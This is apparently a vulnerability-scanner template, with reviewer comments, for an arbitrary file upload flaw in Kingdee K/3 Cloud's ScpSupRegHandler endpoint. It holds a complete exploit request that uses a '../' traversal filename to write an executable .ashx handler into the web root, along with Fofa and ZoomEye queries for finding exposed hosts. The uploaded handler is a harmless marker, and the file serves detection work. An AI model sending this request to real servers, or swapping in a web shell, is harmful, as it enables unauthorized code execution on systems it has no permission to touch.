漏洞描述
金蝶云星空 ScpSupRegHandler 接口存在任意文件上传漏洞;文件上传成功后,访问路径为:/K3Cloud/uploadfiles/{{randstr}}.ashx
Fofa: icon_hash="-1629133697" && title=="金蝶云星空"
ZoomEye: app:"金蝶云星空"
# Detection template: arbitrary file upload through the ScpSupRegHandler endpoint of
# Kingdee K/3 Cloud (金蝶云星空). One multipart POST (rule r0) asks the server to store
# a marker handler under the web-served uploadfiles directory.
# Defender view: a match means an unauthenticated-looking request was able to write an
# executable .ashx into the web root. Typical hardening is to apply the vendor fix,
# restrict who can reach the endpoint, and disable handler execution in upload directories.
# NOTE(review): "kindee" in the id and tags looks like a misspelling of the vendor name
# "Kingdee"; renaming would change the template id, so confirm nothing references it first.
id: kindee-scpsupreghandler-fileupload
info:
name: 金蝶云星空ScpSupRegHandler任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
文件上传成功,访问路径:/K3Cloud/uploadfiles/{{randstr}}.ashx
Fofa: icon_hash="-1629133697" && title=="金蝶云星空"
ZoomEye: app:"金蝶云星空"
reference:
- https://mp.weixin.qq.com/s?__biz=MzIzOTM2MzczNQ==&mid=2247484053&idx=1&sn=c17c0187bbeeec104b3a0382b9f920aa
# NOTE(review): the `fileread` tag does not match the template name (arbitrary file
# upload). Anyone filtering findings by tag will misclassify this result; confirm the
# project's tag vocabulary and use its upload tag instead.
tags: kindee,fileread
created: 2023/12/12
# Per-run random values: rboundary is the multipart boundary suffix, randbody is the
# marker string the uploaded handler prints, randstr is the uploaded file's base name.
# Presumably randomLowercase(n) yields n random lowercase letters. Confirm against the engine.
set:
rboundary: randomLowercase(8)
randbody: randomLowercase(32)
randstr: randomLowercase(6)
rules:
# r0: the upload request itself.
r0:
request:
method: POST
path: /k3cloud/SRM/ScpSupRegHandler
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
# The body carries three form parts: dbId_v, FID and the file part FAtt.
# The FAtt filename contains "../" segments and ends in ".ashx." (with a trailing dot),
# while the file is later expected at /K3Cloud/uploadfiles/{{randstr}}.ashx.
# Presumably the trailing dot is dropped when the file is stored. TODO confirm.
# The file content is a benign marker handler: it only writes {{randbody}} as text/plain.
# Detection signal for log and WAF review: POSTs to this path whose multipart filename
# contains "../", and new .ashx files appearing under the uploadfiles directory.
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"dbId_v\"\r\n\
\r\n\
.\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FID\"\r\n\
\r\n\
2022\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FAtt\"; filename=\"../../../../uploadfiles/{{randstr}}.ashx.\"\r\n\
Content-Type: text/plain\r\n\
\r\n\
<%@ WebHandler Language=\"C#\" Class=\"TestHandler\" %>\r\n\
using System;\r\n\
using System.Web;\r\n\
public class TestHandler : IHttpHandler {\r\n\
public void\r\n\
ProcessRequest (HttpContext context) {\r\n\
context.Response.ContentType= \"text/plain\";\r\n\
context.Response.Write(\"{{randbody}}\");\r\n\
}\r\n\
public bool IsReusable {\r\n\
get {return false; }\r\n\
}\r\n\
}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
# r0 matches on HTTP 200 plus the literal `"IsSuccess": true` in the response body,
# i.e. on the server's own success report, not on the file being reachable.
expression: |
response.status == 200 &&
response.body.bcontains(b'"IsSuccess": true')
# The follow-up rule r1 (GET the uploaded handler and look for randbody) is commented
# out below, so a finding is never confirmed by fetching the file.
# NOTE(review): no rule removes the uploaded file. Every positive run leaves
# {{randstr}}.ashx in uploadfiles, so scanned hosts need cleanup and responders should
# expect such leftover files from scanners.
# r1:
# request:
# method: GET
# path: /K3Cloud/uploadfiles/{{randstr}}.ashx
# expression: response.status == 200 && response.body.bcontains(bytes(randbody))
# Final verdict uses r0 only; the `&& r1()` part is disabled by the trailing comment.
expression: r0() #&& r1()